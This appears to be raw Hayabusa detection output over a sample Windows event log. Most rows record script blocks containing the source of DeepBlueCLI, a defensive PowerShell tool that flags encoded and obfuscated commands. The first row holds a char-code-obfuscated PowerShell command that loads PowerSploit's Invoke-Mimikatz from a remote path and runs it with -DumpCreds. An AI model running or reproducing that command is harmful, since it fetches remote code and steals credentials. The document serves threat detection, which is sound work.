108, 111,105, 116, 47 ,109, 97, 115, 116 , 101 ,114 , 47 , 69 , 120,102, 105 ,108 ,116 , 114, 97, 116 , 105,111,110 , 47 ,73 ,110,118 , 111,107 , 101 , 45 ,77 ,105,109, 105, 107 , 97 ,116 , 122, 46,112, 115 , 49, 39 , 41 , 59,32 , 73 , 110 ,118,111 ,107, 101 , 45,77, 105 ,109,105 , 107 , 97, 116, 122,32 ,45, 68 , 117 , 109, 112,67,114 ,101,100 ,115 )|fOREaCh-Object { ([Int]$_ -aS[CHAR]) }) ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Int]$_ -aS[CHAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.530 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
